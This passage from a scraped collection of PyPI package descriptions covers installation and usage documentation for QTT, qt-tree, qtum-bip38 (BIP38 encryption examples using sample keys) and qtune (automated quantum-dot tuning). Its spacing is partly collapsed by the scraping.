./env/bin/activateorsource ./env/bin/activateOn Windows do:python -m pip install virtualenv\npython -m virtualenv --copies env\nenv\\Scripts\\activate.batNow we are ready to install QTT.Installation from PyPITo use QTT, install it as a pip package:pip install qttor install QTT from source.Installing from sourceThe source for QTT can be found at Github.\nFor the default installation from the QTT source directory execute:git clone https://github.com/QuTech-Delft/qtt.git\ncd qtt\npip install wheelFor QTT development install QTT in editable mode:pip install -e .For non-editable mode do:pip install .When (encountered on Linux) PyQt5 gives an error when installing try upgrading pippip install --upgrade pipand rerun the respective install command.When incompatibility problems ariseSometimes the default installation does not work because of incompatible dependencies between the used packages\non your system. To be sure you use all the right versions of the packages used by QTT and its dependencies do:pip install . -r requirements_lock.txtor for developmentpip install -e . -r requirements_lock.txtThis will install a tested set of all the packages QTT depends on.TestingTests for the QTT packages are contained in the subdirectorytests. To run the tests run the following command:pytestWhen integration tests fail because of errors in plotting try downgrading opencv-python to 4.2.0.34:pip install opencv-python==4.2.0.34Installing for generating documentationTo install the necessary packages to perform documentation activities for QTT do:pip install -e .[rtd]The documentation generation process is dependent on pandoc. When you want to generate the\ndocumentation and pandoc is not yet installed on your system navigate\ntoPandocand follow the instructions found there to install pandoc.\nTo build the 'readthedocs' documentation do:cd docs\nmake htmlVandersypen research groupFor the Vandersypen research group there are more detailed instructions, read the file INSTALL.md in the spin-projects\nrepository.Updating QTTTo update QTT do:pip install . --upgradeUsageSee thedocumentationand the example notebooks in thedocs/notebooksdirectory.For a general introduction also seeIntroduction to GithubScientific python lecturesIf you useSpyderthen use the following settings:Use aIPythonconsole and inTools->Preferences->IPython console->Graphicsset the IPython backend graphics option toQt5. This ensures correctly displaying theParameterViewerandDataBrowserInTools->Preferences->Console->Advanced settingsuncheck the boxEnable UMRContributingSeeContributingfor information about bug/issue reports, contributing code, style, and testingLicenseSeeLicense"} +{"package": "qt-tree", "pacakge-description": "QtTreeQtTree provides a graphical user interface for editing and visualizing tree data structure.Installationpip install qt-treeUsageCheckdemo.pyto know how this library can use.LicenseMIT License.ReferenceQtTree exploits the following libraries:https://github.com/LeGoffLoic/Nodzhttps://github.com/c0fec0de/anytree"} +{"package": "qt-ui-file-sorter", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qtum-bip38", "pacakge-description": "Qtum-BIP38Python library for implementation of BIP38 for Qtum. 
It supports bothNo EC-multiplyandEC-multiplymodes.For more info see thePassphrase-protected private key - BIP38spec.InstallationThe easiest way to installqtum-bip38is via pip:pip install qtum-bip38If you want to run the latest version of the code, you can install from the git:pip install git+git://github.com/qtumproject/qtum-bip38.gitDocumentationRead here:https://bip38.readthedocs.ioWhen you import, replacebip38toqtum_bip38package name.Quick Usageno EC multiply:#!/usr/bin/env python3fromqtum_bip38import(private_key_to_wif,bip38_encrypt,bip38_decrypt)fromtypingimport(List,Literal)importjson# Private keyPRIVATE_KEY:str=\"cbf4b9f70470856bb4f40f80b87edb90865997ffee6df315ab166d713af433a5\"# Passphrase / passwordPASSPHRASE:str=\"qtum123\"# u\"\\u03D2\\u0301\\u0000\\U00010400\\U0001F4A9\"# Network typeNETWORK:Literal[\"mainnet\",\"testnet\"]=\"mainnet\"# To show detailDETAIL:bool=True# Wallet Important Format'sWIFs:List[str]=[private_key_to_wif(private_key=PRIVATE_KEY,wif_type=\"wif\",network=NETWORK),# No compressionprivate_key_to_wif(private_key=PRIVATE_KEY,wif_type=\"wif-compressed\",network=NETWORK)# Compression]forWIFinWIFs:print(\"WIF:\",WIF)encrypted_wif:str=bip38_encrypt(wif=WIF,passphrase=PASSPHRASE,network=NETWORK)print(\"BIP38 Encrypted WIF:\",encrypted_wif)print(\"BIP38 Decrypted:\",json.dumps(bip38_decrypt(encrypted_wif=encrypted_wif,passphrase=PASSPHRASE,network=NETWORK,detail=DETAIL),indent=4))print(\"-\"*125)OutputWIF:5KN7MzqK5wt2TP1fQCYyHBtDrXdJuXbUzm4A9rKAteGu3Qi5CVR\nBIP38EncryptedWIF:6PRP4FDk4BWidB539rEWBH26DRcG2tavQg52WRcyuK5dxMdu8WHVftRZof\nBIP38Decrypted:{\"wif\":\"5KN7MzqK5wt2TP1fQCYyHBtDrXdJuXbUzm4A9rKAteGu3Qi5CVR\",\"private_key\":\"cbf4b9f70470856bb4f40f80b87edb90865997ffee6df315ab166d713af433a5\",\"wif_type\":\"wif\",\"public_key\":\"04d2ce831dd06e5c1f5b1121ef34c2af4bcb01b126e309234adbc3561b60c9360ea7f23327b49ba7f10d17fad15f068b8807dbbc9e4ace5d4a0b40264eefaf31a4\",\"public_key_type\":\"uncompressed\",\"seed\":null,\"address\":\"QeS5U4AEaxPpJ8swzLHEcNbAaNkDfpWjQN\",\"lot\":null,\"sequence\":null}-----------------------------------------------------------------------------------------------------------------------------\nWIF:L44B5gGEpqEDRS9vVPz7QT35jcBG2r3CZwSwQ4fCewXAhAhqGVpP\nBIP38EncryptedWIF:6PYUYP8xySgSbqtYXHGfWUn1xL9F3r9qKru8CUbqeK94QSrJcrSAmZoaEd\nBIP38Decrypted:{\"wif\":\"L44B5gGEpqEDRS9vVPz7QT35jcBG2r3CZwSwQ4fCewXAhAhqGVpP\",\"private_key\":\"cbf4b9f70470856bb4f40f80b87edb90865997ffee6df315ab166d713af433a5\",\"wif_type\":\"wif-compressed\",\"public_key\":\"02d2ce831dd06e5c1f5b1121ef34c2af4bcb01b126e309234adbc3561b60c9360e\",\"public_key_type\":\"compressed\",\"seed\":null,\"address\":\"QRfLX1RpJN25v2jKGPYsQHu8G1ag3sHJeL\",\"lot\":null,\"sequence\":null}-----------------------------------------------------------------------------------------------------------------------------EC multiply:#!/usr/bin/env python3fromqtum_bip38import(intermediate_code,create_new_encrypted_wif,confirm_code,bip38_decrypt)fromtypingimport(List,Literal)importjsonimportos# Passphrase / passwordPASSPHRASE:str=\"qtum123\"# u\"\\u03D2\\u0301\\u0000\\U00010400\\U0001F4A9\"# Network typeNETWORK:Literal[\"mainnet\",\"testnet\"]=\"mainnet\"# To show detailDETAIL:bool=True# List of samples with owner salt, seed, public key type, lot, and sequenceSAMPLES:List[dict]=[# Random owner salt & seed, No compression, No lot & sequence{\"owner_salt\":os.urandom(8),\"seed\":os.urandom(24),\"public_key_type\":\"uncompressed\",\"lot\":None,\"sequence\":None},# Random owner salt & seed, No compression, With 
lot & sequence{\"owner_salt\":os.urandom(8),\"seed\":os.urandom(24),\"public_key_type\":\"uncompressed\",\"lot\":863741,\"sequence\":1},# Random owner salt & seed, Compression, No lot & sequence{\"owner_salt\":os.urandom(8),\"seed\":os.urandom(24),\"public_key_type\":\"compressed\",\"lot\":None,\"sequence\":None},# Random owner salt & seed, Compression, With lot & sequence{\"owner_salt\":os.urandom(8),\"seed\":os.urandom(24),\"public_key_type\":\"compressed\",\"lot\":863741,\"sequence\":1},# With owner salt & seed, No compression, No lot & sequence{\"owner_salt\":\"75ed1cdeb254cb38\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"uncompressed\",\"lot\":None,\"sequence\":None},# With owner salt & seed, No compression, With lot & sequence{\"owner_salt\":\"75ed1cdeb254cb38\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"uncompressed\",\"lot\":567885,\"sequence\":1},# With owner salt & seed, Compression, No lot & sequence{\"owner_salt\":\"75ed1cdeb254cb38\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"compressed\",\"lot\":None,\"sequence\":None},# With owner salt & seed, Compression, With lot & sequence{\"owner_salt\":\"75ed1cdeb254cb38\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"compressed\",\"lot\":369861,\"sequence\":1},]forSAMPLEinSAMPLES:intermediate_passphrase:str=intermediate_code(passphrase=PASSPHRASE,owner_salt=SAMPLE[\"owner_salt\"],lot=SAMPLE[\"lot\"],sequence=SAMPLE[\"sequence\"])print(\"Intermediate Passphrase:\",intermediate_passphrase)encrypted_wif:dict=create_new_encrypted_wif(intermediate_passphrase=intermediate_passphrase,public_key_type=SAMPLE[\"public_key_type\"],seed=SAMPLE[\"seed\"],network=NETWORK)print(\"Encrypted WIF:\",json.dumps(encrypted_wif,indent=4))print(\"Confirm Code:\",json.dumps(confirm_code(passphrase=PASSPHRASE,confirmation_code=encrypted_wif[\"confirmation_code\"],network=NETWORK,detail=DETAIL),indent=4))print(\"BIP38 
Decrypted:\",json.dumps(bip38_decrypt(encrypted_wif=encrypted_wif[\"encrypted_wif\"],passphrase=PASSPHRASE,network=NETWORK,detail=DETAIL),indent=4))print(\"-\"*125)OutputIntermediatePassphrase:passphraserBh92DkAgrAfqUTZoL8daK85X4UtSzQnEFABTmZf6prj1bAa6kPihApMd92xmw\nEncryptedWIF:{\"encrypted_wif\":\"6PfVzPRrrLrv3geDZV6GWcLfGRHBGagK31jBTTBd5f5QknK2S1p1ajLMe6\",\"confirmation_code\":\"cfrm38V5kycvZygpKdQmq3TjNED2womqd24UgVxFaxCuBnEAqp1aCUqQLSSAJBifBkcQDj33EcP\",\"public_key\":\"0440097fbf7fc6a3dea0962ee4e1701a9cd3964eb0223f243b759e1c04fda754ab88efcdb76753217c7d7b6456932bb8d77e5db1b4de3b22ce561d5daec1c8f809\",\"seed\":\"8637d0313eac9aab134ace0d010cf7856ffd2275cd4aba4c\",\"public_key_type\":\"uncompressed\",\"address\":\"QTPiD2P1zBz5fiGXxBkLdDyhySqTR7dvuy\"}ConfirmCode:{\"public_key\":\"0440097fbf7fc6a3dea0962ee4e1701a9cd3964eb0223f243b759e1c04fda754ab88efcdb76753217c7d7b6456932bb8d77e5db1b4de3b22ce561d5daec1c8f809\",\"public_key_type\":\"uncompressed\",\"address\":\"QTPiD2P1zBz5fiGXxBkLdDyhySqTR7dvuy\",\"lot\":null,\"sequence\":null}BIP38Decrypted:{\"wif\":\"5JSLzkUVB6ifEHgQBYrNKBpupV9SFccSfYiVjazAu3bpykVLJ5z\",\"private_key\":\"51e047d800758ea123d778f0bc7b375ef7a4a980ed5defaa9d535bc22d728e60\",\"wif_type\":\"wif\",\"public_key\":\"0440097fbf7fc6a3dea0962ee4e1701a9cd3964eb0223f243b759e1c04fda754ab88efcdb76753217c7d7b6456932bb8d77e5db1b4de3b22ce561d5daec1c8f809\",\"public_key_type\":\"uncompressed\",\"seed\":\"8637d0313eac9aab134ace0d010cf7856ffd2275cd4aba4c\",\"address\":\"QTPiD2P1zBz5fiGXxBkLdDyhySqTR7dvuy\",\"lot\":null,\"sequence\":null}-----------------------------------------------------------------------------------------------------------------------------\nIntermediatePassphrase:passphrasea9wRhemdARJDoZzZMiVcmZaBrQYhofqaNuTAHgLyQmoUjLmpwFtyzFvjcoPRqA\nEncryptedWIF:{\"encrypted_wif\":\"6PgP82oWUAUAVAT41HBXsWih74ZSC5GT5dMbFWoxPYgLHHYbgo3XM7yJ3C\",\"confirmation_code\":\"cfrm38V8dbJk9zPFcbN84DF4u4mnkGBMrmM56rtWQyt22aDLNqfYmgEyYuLVq1uEW41LdqVfaf7\",\"public_key\":\"045c68c340753c4f416f44cf94eaa2240f0ed054332c87d9a6c4e0bcb4f6f5ebaaaf325b62f066a4e561ec1fd8d3bc546cddbe97889c59a2fd60e2d89b101a1171\",\"seed\":\"88cfd3b2a526ff29a62d429e52e597c24af6465edd011de3\",\"public_key_type\":\"uncompressed\",\"address\":\"Qf5NdtPRxsNeUTPckEyMW6cc7JpipJRJSw\"}ConfirmCode:{\"public_key\":\"045c68c340753c4f416f44cf94eaa2240f0ed054332c87d9a6c4e0bcb4f6f5ebaaaf325b62f066a4e561ec1fd8d3bc546cddbe97889c59a2fd60e2d89b101a1171\",\"public_key_type\":\"uncompressed\",\"address\":\"Qf5NdtPRxsNeUTPckEyMW6cc7JpipJRJSw\",\"lot\":863741,\"sequence\":1}BIP38Decrypted:{\"wif\":\"5JhYHSPBT4XHuzyjGgxiL6be1zGJzQGoSrRRm7ijWccASdLiCkC\",\"private_key\":\"746098bcac5ecbd247f8fd1ca75340bc95bffa53e800169deb77b7e7143b246b\",\"wif_type\":\"wif\",\"public_key\":\"045c68c340753c4f416f44cf94eaa2240f0ed054332c87d9a6c4e0bcb4f6f5ebaaaf325b62f066a4e561ec1fd8d3bc546cddbe97889c59a2fd60e2d89b101a1171\",\"public_key_type\":\"uncompressed\",\"seed\":\"88cfd3b2a526ff29a62d429e52e597c24af6465edd011de3\",\"address\":\"Qf5NdtPRxsNeUTPckEyMW6cc7JpipJRJSw\",\"lot\":863741,\"sequence\":1}-----------------------------------------------------------------------------------------------------------------------------\nIntermediatePassphrase:passphrasemh3J6kj36t1846BnPFZL1caQN55pJfdcSSCztsQLBzF3jETYppiU5xYSsZrC5e\nEncryptedWIF:{\"encrypted_wif\":\"6PnSDkPgRS869GdKSHbUkm6VdKzUZiEtuDSUQUuYAJ2VumpTo3Y7cXbjFc\",\"confirmation_code\":\"cfrm38VUMfQFA5nUna7HpkQoiQSWMmw64rnPF3Zwu6g6S6CnXoXDey3Ptovhr9DKZymFQRYnesB\",\"public_key\":\"0208d6c6104daf76cdf8eb4ee75afd83b577
6fd120e2d9a7cb78df5268fe534a37\",\"seed\":\"4bc118a7011b225af9e475f21816e8e71d47c103846e19c2\",\"public_key_type\":\"compressed\",\"address\":\"QgCL3wEfZP7RPQ3RRhazRx9Buuq2PLLqoG\"}ConfirmCode:{\"public_key\":\"0208d6c6104daf76cdf8eb4ee75afd83b5776fd120e2d9a7cb78df5268fe534a37\",\"public_key_type\":\"compressed\",\"address\":\"QgCL3wEfZP7RPQ3RRhazRx9Buuq2PLLqoG\",\"lot\":null,\"sequence\":null}BIP38Decrypted:{\"wif\":\"L4ybEBRKhicidQbeGHjy4f4Wyvad5Kgnwk7FqeQntqwUMcr7ERF1\",\"private_key\":\"e76f72811b89f63d88a7329eeedef16710ea66714672021a177e07fd5473f61a\",\"wif_type\":\"wif-compressed\",\"public_key\":\"0208d6c6104daf76cdf8eb4ee75afd83b5776fd120e2d9a7cb78df5268fe534a37\",\"public_key_type\":\"compressed\",\"seed\":\"4bc118a7011b225af9e475f21816e8e71d47c103846e19c2\",\"address\":\"QgCL3wEfZP7RPQ3RRhazRx9Buuq2PLLqoG\",\"lot\":null,\"sequence\":null}-----------------------------------------------------------------------------------------------------------------------------\nIntermediatePassphrase:passphraseZi3JhthoBvhc8wenvQW7Hd7jBcmNjMKg544pQE2kVd5NCvt8qqoV6RLUaWZrEV\nEncryptedWIF:{\"encrypted_wif\":\"6PoE1PPV7YBVbkPZLsKZGE3T6imCpuDq9pxF1v779xtzo4dd8W13tAn2qD\",\"confirmation_code\":\"cfrm38VWvrvCAhjKDVmjnJp1dsTcJphB8YkK9jXygpLAEDQVCoeguazChN5JCpP6EsmWr5iB4wb\",\"public_key\":\"036a8f9c1a4d769b7326037cea69009560dbdb35b749ce1b8e716485a8730cfc09\",\"seed\":\"1140bf8c4f8c4ca09f90cce6da1ea8de1e43ac37165fe27f\",\"public_key_type\":\"compressed\",\"address\":\"QdxToVfxRc5PXtf28STR8u2JpmvpQsevF4\"}ConfirmCode:{\"public_key\":\"036a8f9c1a4d769b7326037cea69009560dbdb35b749ce1b8e716485a8730cfc09\",\"public_key_type\":\"compressed\",\"address\":\"QdxToVfxRc5PXtf28STR8u2JpmvpQsevF4\",\"lot\":863741,\"sequence\":1}BIP38Decrypted:{\"wif\":\"L5BrcjdARTnCVjZa9AbeRR6GpZoP9bqp44Puj7VzvWeBUTYUu597\",\"private_key\":\"edbebe261a5eca1164911bf523f890a4a99051947c34bec7df71db16b29cfb98\",\"wif_type\":\"wif-compressed\",\"public_key\":\"036a8f9c1a4d769b7326037cea69009560dbdb35b749ce1b8e716485a8730cfc09\",\"public_key_type\":\"compressed\",\"seed\":\"1140bf8c4f8c4ca09f90cce6da1ea8de1e43ac37165fe27f\",\"address\":\"QdxToVfxRc5PXtf28STR8u2JpmvpQsevF4\",\"lot\":863741,\"sequence\":1}-----------------------------------------------------------------------------------------------------------------------------\nIntermediatePassphrase:passphraseondJwvQGEWFNsbiN6AVu4r4dPFz4xeJoLg2vQGULvMzgYRKiGezwNDzaAxfX57\nEncryptedWIF:{\"encrypted_wif\":\"6PfMmFWzXobLGrJReqJaNnGcaCMd9T3Xhcwp2jkCHZ6jZoDJ2MnKk15ZuV\",\"confirmation_code\":\"cfrm38V5JArEGuKEKE8VSMDSKvS8eZXYq3DckKyFDtw76GxW1TBzdKcovWdL4PbQnPLvJ5EpmZp\",\"public_key\":\"049e60857454bff0635324e132e00f102fbe1ab6b0846b12737eca18a05b473e2a0afa7d996c7b49b03fb4d070d94fd765841f7e172f7727bfceed65e98f940c2d\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"uncompressed\",\"address\":\"QXsy25WUg3kARS1o4t8si4AsyuwZjLkY9R\"}ConfirmCode:{\"public_key\":\"049e60857454bff0635324e132e00f102fbe1ab6b0846b12737eca18a05b473e2a0afa7d996c7b49b03fb4d070d94fd765841f7e172f7727bfceed65e98f940c2d\",\"public_key_type\":\"uncompressed\",\"address\":\"QXsy25WUg3kARS1o4t8si4AsyuwZjLkY9R\",\"lot\":null,\"sequence\":null}BIP38Decrypted:{\"wif\":\"5JDa1CcN3iLbFeexZC2RhyEkFU2B7oieHAVs5YDwieMhgVS9S9c\",\"private_key\":\"34de039d8e90172f246ec3190fc8bd98e46f11bc5d50d062d0d6f806e43372a9\",\"wif_type\":\"wif\",\"public_key\":\"049e60857454bff0635324e132e00f102fbe1ab6b0846b12737eca18a05b473e2a0afa7d996c7b49b03fb4d070d94fd765841f7e172f7727bfceed65e98f940c2d\",\"public_key_type\":\"un
compressed\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"address\":\"QXsy25WUg3kARS1o4t8si4AsyuwZjLkY9R\",\"lot\":null,\"sequence\":null}-----------------------------------------------------------------------------------------------------------------------------\nIntermediatePassphrase:passphraseb7ruSNPsLdQF57XQM4waP887G6qoGhPVpDS7jEorTKpfXYFxnUSSVwtpQZPT4U\nEncryptedWIF:{\"encrypted_wif\":\"6PgLaWLw6fb6uDBtnN6QVyT9AbvN4zFi8E4oLdSiEWCqsHZFAtcY4wP4LW\",\"confirmation_code\":\"cfrm38V8VJb8xnvVY1kkRRVanmL4F91nfuQAZctydcGYKS8ZjPxyZHnACqfJ3ni1AwaCkDMsWVF\",\"public_key\":\"04263351adcb7d9298c6865a597ef63094a8e79f35110aab71d29347acd29ddb0c22e139924e329ae9a84b806c27f919c5e60f8f299ed004256109658b5c11b7b7\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"uncompressed\",\"address\":\"QfAtAjYNEQMAVtxNaXCWcg1rws3ubJJAED\"}ConfirmCode:{\"public_key\":\"04263351adcb7d9298c6865a597ef63094a8e79f35110aab71d29347acd29ddb0c22e139924e329ae9a84b806c27f919c5e60f8f299ed004256109658b5c11b7b7\",\"public_key_type\":\"uncompressed\",\"address\":\"QfAtAjYNEQMAVtxNaXCWcg1rws3ubJJAED\",\"lot\":567885,\"sequence\":1}BIP38Decrypted:{\"wif\":\"5KXP2dhbmUsgPAFU6Uu6iY4ePafMc53fLjs9mdQXbmPvoLtxiSj\",\"private_key\":\"e1013f4521ffeefb06aad092a040189075a5163af3c6cb7ca1622cbea2d498fc\",\"wif_type\":\"wif\",\"public_key\":\"04263351adcb7d9298c6865a597ef63094a8e79f35110aab71d29347acd29ddb0c22e139924e329ae9a84b806c27f919c5e60f8f299ed004256109658b5c11b7b7\",\"public_key_type\":\"uncompressed\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"address\":\"QfAtAjYNEQMAVtxNaXCWcg1rws3ubJJAED\",\"lot\":567885,\"sequence\":1}-----------------------------------------------------------------------------------------------------------------------------\nIntermediatePassphrase:passphraseondJwvQGEWFNsbiN6AVu4r4dPFz4xeJoLg2vQGULvMzgYRKiGezwNDzaAxfX57\nEncryptedWIF:{\"encrypted_wif\":\"6PnQ3P5GdsSJSUcJCAmtvn74U9gqPs8JMZLdVBkBYsUvSVd4TjgSZEqB7w\",\"confirmation_code\":\"cfrm38VUEZdLCyEmCMZqbbvdhUdsuPZdYy2tmBcbDdmdkyFiLyiScPQSeotgvS6vQZjPXhj92Xj\",\"public_key\":\"039e60857454bff0635324e132e00f102fbe1ab6b0846b12737eca18a05b473e2a\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"compressed\",\"address\":\"QS3xSF9psn8DMT6uBExPDkm258eJPqJbsB\"}ConfirmCode:{\"public_key\":\"039e60857454bff0635324e132e00f102fbe1ab6b0846b12737eca18a05b473e2a\",\"public_key_type\":\"compressed\",\"address\":\"QS3xSF9psn8DMT6uBExPDkm258eJPqJbsB\",\"lot\":null,\"sequence\":null}BIP38Decrypted:{\"wif\":\"KxzUftF5tyTUBfCYD5fJ3qDftrGBf3CoYLvQ32p8WotNYrMW4c3t\",\"private_key\":\"34de039d8e90172f246ec3190fc8bd98e46f11bc5d50d062d0d6f806e43372a9\",\"wif_type\":\"wif-compressed\",\"public_key\":\"039e60857454bff0635324e132e00f102fbe1ab6b0846b12737eca18a05b473e2a\",\"public_key_type\":\"compressed\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"address\":\"QS3xSF9psn8DMT6uBExPDkm258eJPqJbsB\",\"lot\":null,\"sequence\":null}-----------------------------------------------------------------------------------------------------------------------------\nIntermediatePassphrase:passphraseb7ruSNDGP7cmphxdxHWx8oo88zHuBBeFyvaWYD2zqHUpLwvXYhqTBnwxiiCUf6\nEncryptedWIF:{\"encrypted_wif\":\"6PoLtrDYSMopr5nRKDN9LDanSPiSPRQ3vkfmT2gj4c3E3S5FeGTmyuG12z\",\"confirmation_code\":\"cfrm38VXKJasUvzUJiyuBsX5TqVdhNV4BhzXEE8ge9TAm3Y13jobt5x8BMqcXNEpdDLgumedBBW\",\"public_key\":\"03548814ac8ce03397f544dfa9bde1d148b503237103362da170fd3f330cf3e094\",\"seed\":\"99241d58245c883896f80843d284
6672d7312e6195ca1a6c\",\"public_key_type\":\"compressed\",\"address\":\"QQ2yBHc39h3Fyb8AnKuwtw1Soxpq9f4GRt\"}ConfirmCode:{\"public_key\":\"03548814ac8ce03397f544dfa9bde1d148b503237103362da170fd3f330cf3e094\",\"public_key_type\":\"compressed\",\"address\":\"QQ2yBHc39h3Fyb8AnKuwtw1Soxpq9f4GRt\",\"lot\":369861,\"sequence\":1}BIP38Decrypted:{\"wif\":\"L3uXqD8dC2zNpRdDVfsmUCNrz6HMXk2j9fVkgftwd3SM35W6XNVL\",\"private_key\":\"c7829407b0a6aee68539bcc4f58878722ac0f441aa462b303da31ab232253d64\",\"wif_type\":\"wif-compressed\",\"public_key\":\"03548814ac8ce03397f544dfa9bde1d148b503237103362da170fd3f330cf3e094\",\"public_key_type\":\"compressed\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"address\":\"QQ2yBHc39h3Fyb8AnKuwtw1Soxpq9f4GRt\",\"lot\":369861,\"sequence\":1}-----------------------------------------------------------------------------------------------------------------------------DevelopmentTo get started, just fork this repo, clone it locally, and run:pip install -e .[tests] -r requirements.txtTestingYou can run the tests with:pytestOr usetoxto run the complete suite against the full set of build targets, or pytest to run specific\ntests against a specific version of Python.LicenseDistributed under theMITlicense. SeeLICENSEfor more information."} +{"package": "qtune", "pacakge-description": "qtune Readme: IntroductionThe qtune package contains tools for the setup of a general optimization program. It is originally designed for the\nautomatic fine-tuning of semiconductor spin qubits based on gate defined quantum dots, but applicable to general\noptimization problems with dependent target parameters.\nAn interface to the physical back-end must be provided. With this back-end, control\nparameters (here assumed to be voltages) are set and target parameters are measured.Class names are writtenboldand functionscursivethroughout the readme. UML class diagrams are inserted to show\nthe heritage and dependencies, and UML activity diagrams visualize function calls.\nThe package abbreviations are pd for pandas and np for numpy.Installationqtune is compatible with Python 3.5+.\nFor development we recommend cloning the git repositoryhttps://github.com/qutech/qtuneand installing by:python setup.py developIt can also be installed as pip package:pip install qtuneInterface of the Physical Back-EndThe core features of this program package do not require a specific structure of the measurement software. This section\nconcerns only the required interface of the physical back-end.\nTheExperimentclass serves as abstraction of the physical experiment. It provides an interface to the control\nparameters with two functions calledread_gate_voltages() andset_gate_voltages(new_voltages). 
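To make this contract concrete, here is a minimal sketch of what such a back-end could look like. The plain-class form, gate names and safety limits are illustrative assumptions for this sketch, not part of the qtune API; in a real setup the class would wrap the actual hardware connection.

class MyExperiment:
    """Hypothetical physical back-end exposing the two required calls."""

    def __init__(self):
        # Assumed representation: a dict mapping gate names to voltages.
        self._voltages = {'SB': -0.80, 'T': -0.75}
        self._safety_range = (-2.0, 0.0)  # assumed hardware limits in volts

    def read_gate_voltages(self):
        # Report the control parameters currently applied.
        return dict(self._voltages)

    def set_gate_voltages(self, new_voltages):
        # Clamp requests to the safety range and report what was actually set.
        low, high = self._safety_range
        applied = {gate: min(high, max(low, float(v))) for gate, v in new_voltages.items()}
        self._voltages.update(applied)
        return applied

Returning the dictionary of values actually applied is what keeps the tuning algorithm consistent with the hardware, as described next.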
The functionset_gate_voltages(new_voltages) returns the voltages it has actually set to the experiment, which is useful if the\nhardware connected to the physical experiment uses a different floating point accuracy, or theExperimentis\nordered to set voltages exceeding physical or safety limits.TheEvaluatorclass provides the functionevaluate() which returns a fixed number of parameters and a measurement\nerror, which is interpreted as the variance of the evaluation.Proposed Measurement and Evaluation StructureThe implementation of a physical back-end, as contained in the qtune package, should be regarded as proposal.TheExperimentprovides the functionmeasure(Measurement), which receives an instance of theMeasurementclass and returns the raw data.\nTheMeasurementcontains a dictionary of data of any type used to define the physical measurement.\nTheEvaluatorclass calls the functionExperiment.measure(Measurement) to initiate the physical\nmeasurements. It contains a list ofMeasurementsand the analysis software required to extract the parameters from the raw data returned by the\nexperiment. This could be for example a fitting function or an edge detection.Parameter TuningThis section describes how the dependency between parameters is taken into account.\nThe parameters are grouped by instances of theParameterTunerclass. Each group is tuned simultaneously, i.e.\ndepends on the same set of distinct parameters. The dependencies are assumed always one directional and static. TheAutotunerstructures the groups of parameters in an hierarchy, which is represented as list ofParameterTuners.Consider the following example from the tuning of a quantum dot array.\nImagine the following hierarchy consisting of three groups of parameters i.e. threeParameterTuners:Contrast in the Sensing Dot SignalChemical Potentials / Positions of the Charge Stability DiagramTunnel CouplingsAll scans require a good contrast in the sensing dot for an accurate evaluation of the parameters. Therefore the\ncontrast in the sensing dot signal is the first element in the hierarchy. The measurement of tunnel couplings requires\nknowledge of the positions of transitions in the charge diagram. If the chemical potentials change, the charge\ndiagram is shifted, therefore the position of the charge diagram i.e. the chemical potentials must be tuned before the\ntunnel couplings.AParameterTunersuggests voltages to tune the parameters in his group.\nIt can be restricted to use any set of gates. It can also slice the voltage corrections\nto restrict the step size so that the algorithm is less vulnerable to the non-linearity of the target parameters.\nThe tuning of a group of parameters does ideally not detune the parameters which the group depends on i.e. which are\nhigher in the hierarchy.TheAutotunerclass handles the coordination between the groups of parameters in the following sense. It decides which group of\nparameters must currently be evaluated or tuned and calls theParameterTunerto evaluate the corresponding\ngroup of parameters or to suggest new voltages. It also sets the new voltages on the Experiment.\nIt works as finite-state machine as described in the UML activity diagram below.Optimization AlgorithmsThe voltage steps of eachParameterTunerare calculated by its member instance of theSolverclass. This class\ncan implement any optimization algorithm e.g. 
Nelder-Mead or Gauss-Newton algorithm.\nGradient basedSolverslike the Gauss-Newton algorithm use a instance of theGradientEstimatorclass for the\ncalculation of the gradient of target parameter.TheGradientEstimatorsubclasses implement different methods for the gradient estimation. One example is the\nKalman filter in theKalmanGradientEstimator. This is an algorithm which calculates updates on the gradient by\ninterpreting each measurement as finite difference measurement with respect to the last voltages. The accuracy of the\nparameter evaluation is then compared to the uncertainty of the estimation of the gradient in order to find the\nmost likely gradient estimation. Thereby, the gradient estimation is described as multidimensional normal distribution,\ndefined by a mean and a covariance matrix. If the covariance becomes to large in a certain direction, theKalmanGradientEstimatorsuggests a tuning step in the direction of the maximal covariance. This tuning step does not\noptimize any parameter but should be understood as finite difference measurement.The crucial point in the optimization of non orthogonal systems is the ability to tune certain parameters without\nchanging the other ones. This requires communication between theSolverinstances. DifferentSolverscan\ntherefore share the same instances of theGradientEstimatorsso that they know the dependency of these parameters\non the gate voltages.Furthermore, theAutotunercommunicates which parameters are already tuned to theParameterTuners. AParameterTunercan share this information with it'sSolver, which then calculates update steps\nin the null space of the gradients belonging to parameters which are tuned by anotherParameterTuners.\nASolveralso passes this information on to it'sGradientEstimators, which calculate the gradients only in the\nmentioned null space.Getting StartedThe IPython notebook \"setup_tutorial.ipynb\" gives a detailed\ntutorial for the setup of an automated fine-tuning program. The physical back-end is replaced by a simulation to enable\nthe tutorial to be executed before the connection to an experiment.\nIn this simulated experiment, a double quantum dot and a sensing dot are tuned. The tuning hierarchy is given byTheParameterTunersandSolverswhich are used in the setup serve as an illustrative example.\nThey are structured in the tuning hierarchy:the sensing dotthe x and y position of the charge diagramtwo parameters, being the inter dot tunnel coupling and the singlet reload timeThe gates of the sensing dot are assumed to have only an negligible effect on the positions and\nparameters. Therefore theSolverof the sensing dot is independent of the others. The other gates are simultaneously\ntuning the positions and parameters. The positions and parameters are tuned byParameterTunersrestricted to the\nsame gates and theirSolverinstances share allGradientEstimators. TheGradientEstimatorsbelonging to the\nparameters estimate the gradients only in the null space of the gradients belonging to the positions.FeaturesStorageAfter each evaluation of parameters, change in voltages or estimation of gradients,\nthe full state of all classes except for the experiment is serialized and stored\nin an HDF5 file. The full state of the program can be reinitialized from any library file. This 